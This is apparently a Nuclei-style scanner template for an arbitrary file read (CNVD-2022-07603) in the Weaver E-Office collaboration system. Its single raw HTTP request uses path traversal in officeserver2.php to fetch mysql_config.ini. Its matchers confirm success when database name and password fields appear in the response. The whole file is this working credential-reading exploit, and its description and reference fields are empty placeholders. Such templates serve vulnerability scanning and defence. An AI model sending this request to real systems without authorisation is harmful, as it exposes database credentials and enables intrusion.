id: weaver_office_officeserver2_fileread
info:
  name: 泛微E-Office协同管理系统存在任意文件读取漏洞CNVD-2022-07603
  author: mhb17
  severity: high
  description: description
  reference:
    - https://
  tags: fileread
requests:
  - raw:
      - |+
        GET /iweboffice/officeserver2.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'dataname = '
      - type: word
        part: body
        words:
          - datapassword =
      - type: word
        part: header
        words:
          - '200'